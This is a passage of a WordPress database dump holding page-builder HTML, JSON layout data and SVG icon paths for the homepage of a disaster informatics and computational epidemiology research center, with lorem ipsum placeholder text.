d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',22,'https://gsudice.dataconn.net/?p=304',0,'revision','',0),(308,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',168,'https://gsudice.dataconn.net/?p=308',0,'revision','',0),(309,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n 